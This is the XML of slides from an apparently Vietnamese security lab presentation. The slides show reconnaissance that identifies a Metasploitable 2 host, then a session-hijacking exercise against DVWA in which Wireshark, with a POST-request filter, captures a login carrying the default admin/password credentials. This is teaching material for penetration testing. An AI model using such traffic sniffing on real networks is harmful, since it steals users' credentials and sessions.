              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thám</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> tin (Reconnaissance and Sniffing): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Sau khi do thám mạng, địa chỉ 192.168.164.129 được xác định là máy chủ Metasploitable 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74933425-1751-A913-4CA2-9D101AA134B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="127000" y="0"/>
            <a:ext cx="8544559" cy="5555367"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12933818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EE0A-7E44-B93E-FBFF-77717BD21E2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337A244-C66B-2DEE-FC70-4248D1289F61}"/>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4B0BAC74-4836-2E63-4C16-C29D849F762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111</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B8BAC7B-2232-9DF3-7C05-583F45D5B756}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="568674" y="865270"/>
            <a:ext cx="8006651" cy="3810001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10573573-2A4D-713C-971A-859645719AB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="165123"/>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Dịch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>vụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>trợ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>khai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> DVWA.</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25039760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3BA4F-06EA-2F26-5632-6B9F333AF6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6170B8D-8D59-8992-2896-F081E026EFE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4D9FF1CB-C433-9167-45F6-FE77970570E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="298037"/>
            <a:ext cx="9029700" cy="1305486"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>3.3.1.2.	Đánh cắp Phiên làm việc (Session Hijacking)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DDC6C4E-4E10-B5D1-6DE1-43BF0AFB65C3}"/>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112</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{534DFE86-2B35-52D0-4553-9CE4BCAB40F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1736849"/>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Tiến </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hành</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>mở</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Terminal run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F253ACDB-3C8A-B022-AF75-180475BEC246}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="2303670"/>
            <a:ext cx="5220335" cy="3891915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14469896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9CEE1-E3D2-AC23-2959-99D63FAB48C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D87AF17-CE48-863B-E306-4027E245C0D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0F54FEAC-8998-07F5-D451-2D998845AFB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="298037"/>
            <a:ext cx="9029700" cy="1305486"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>3.3.1.2.	Đánh cắp Phiên làm việc (Session Hijacking)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BA87B72-BBBB-2B69-159D-2A062B808A1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113</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39623B82-4A58-725C-E713-2802347939A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1736849"/>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Tiến </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hành</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>mở</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Terminal run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51D25643-A511-0B56-9AAE-B71D79FC05DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="2303670"/>
            <a:ext cx="5220335" cy="3891915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12302860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896F7-524A-9394-19C8-E76EC2851D0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763B15D-E872-FC9F-CA4D-17FC608D1AB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5B0390AF-4EDB-07CF-A9AB-842DF9C3653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114</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6E50414-D5F7-3E4D-B402-7617950DDB9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="165123"/>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Trên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thanh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> filter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>gõ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>http.request.method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> == “POST” </a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1864FFC6-E68D-532A-D86E-57D1ED48DB66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="115954" y="1123928"/>
            <a:ext cx="8912091" cy="4057672"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34024241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5A3F8-69AA-FFC3-ACCD-CF40897B72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6466BB-8D66-A882-7E91-C9F0E932DDD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94986914-4156-5B9E-9486-B3B89A8E2A9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115</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5E6BB3E-E0C0-1518-0CE8-40299ACF4F57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="165123"/>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Giả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>định</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>rằng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Username: admin, Password: password.</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38E8740C-BC9B-93C6-4CD9-4B05CDFB909A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="1041065"/>
            <a:ext cx="7467600" cy="4178635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1517277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61DD3-1FAA-978C-4153-8816E1C8750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A5DE88C-6373-AAA0-5C19-0055C27939A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910CB92-A192-76FF-2BCA-C5DFBEF96FF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116</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A6C647F-A3E2-D0F8-C3FE-838574D134C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1651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Khi Admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>nhấp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>vào</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Login,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Wireshark đã bắt được gói tin HTTP này</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A82FA61-77AE-A4B6-98DE-F1D0C413519B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="118068" y="1358882"/>
            <a:ext cx="8822732" cy="4190995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30384523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B68B7-CC7C-C4A2-B0DE-E70833C2CF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7AF36D-855D-9652-1C7D-1A51AB216D2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34BA08A-5EDB-2815-9C62-828E0BF5B07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117</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
